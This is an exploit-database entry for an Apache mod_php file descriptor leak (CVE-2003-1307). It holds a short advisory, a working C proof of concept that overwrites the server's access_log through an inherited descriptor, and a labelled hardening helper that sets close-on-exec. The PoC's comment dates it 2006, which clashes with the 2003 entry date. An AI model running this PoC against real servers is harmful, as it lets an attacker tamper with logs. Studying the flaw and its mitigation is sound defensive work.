Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)

2003-12-26T00:00:00
ID EDB-ID:23482
Type exploitdb
Reporter frauk\x41ser
Modified 2003-12-26T00:00:00

Description

Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2). CVE-2003-1307. Local exploit for the Linux platform.

source: http://www.securityfocus.com/bid/9302/info

The Apache mod_php module is reportedly prone to a vulnerability that may allow a local attacker to gain access to privileged file descriptors. As a result, the attacker may pose as a legitimate server and possibly steal or manipulate sensitive information.

/*
 * Apache's access_log can be overwritten with arbitrary content
 * from executables called by PHP.
 * POC by frauk\x41ser && sk0L / SEC Consult 2006
 */

#include <unistd.h>
#include <fcntl.h>

#define LOGFD 7 /* descriptor on which the PoC expects the inherited access_log */

int main(void){
        fcntl(LOGFD, F_SETFL, O_WRONLY); // change mode from append to write (clears O_APPEND)
        lseek(LOGFD, 0, SEEK_SET); // reposition to start of file
        write(LOGFD,"hehe\n",5);
        return 0;
}
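
A descriptor opened without the close-on-exec flag stays open in every program the process later starts with exec(), which is the condition the PoC above relies on. The following is an added example, not code from the original advisory or from Apache or PHP: a generic hardening helper that counts descriptors that would survive exec() and marks them FD_CLOEXEC. The function names, SCAN_LIMIT and the /dev/null stand-in are assumptions.

```c
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

#define SCAN_LIMIT 65536 /* assumption: highest descriptor number scanned */

static int scan_end(void)
{
    long max = sysconf(_SC_OPEN_MAX);
    return (max < 0 || max > SCAN_LIMIT) ? SCAN_LIMIT : (int)max;
}

/* Count open descriptors >= lowfd that would survive exec(),
 * i.e. those that do not have FD_CLOEXEC set. */
int count_inheritable_fds(int lowfd)
{
    int n = 0, end = scan_end();
    for (int fd = lowfd; fd < end; fd++) {
        int flags = fcntl(fd, F_GETFD);
        if (flags != -1 && !(flags & FD_CLOEXEC))
            n++;
    }
    return n;
}

/* Set FD_CLOEXEC on every open descriptor >= lowfd; intended for use
 * between fork() and exec(). Returns descriptors changed, or -1 on error. */
int set_cloexec_from(int lowfd)
{
    int changed = 0, end = scan_end();
    for (int fd = lowfd; fd < end; fd++) {
        int flags = fcntl(fd, F_GETFD);
        if (flags == -1 || (flags & FD_CLOEXEC))
            continue; /* closed, or already protected */
        if (fcntl(fd, F_SETFD, flags | FD_CLOEXEC) == -1)
            return -1;
        changed++;
    }
    return changed;
}

int main(void)
{
    /* Constructed stand-in for the server's access_log descriptor. */
    int logfd = open("/dev/null", O_WRONLY | O_APPEND);
    printf("fd %d open, inheritable >= 3: %d\n", logfd, count_inheritable_fds(3));
    printf("marked: %d, left: %d\n", set_cloexec_from(3), count_inheritable_fds(3));
    return 0;
}
```

Opening the file with O_CLOEXEC in the first place avoids the window between open() and the later fcntl() call.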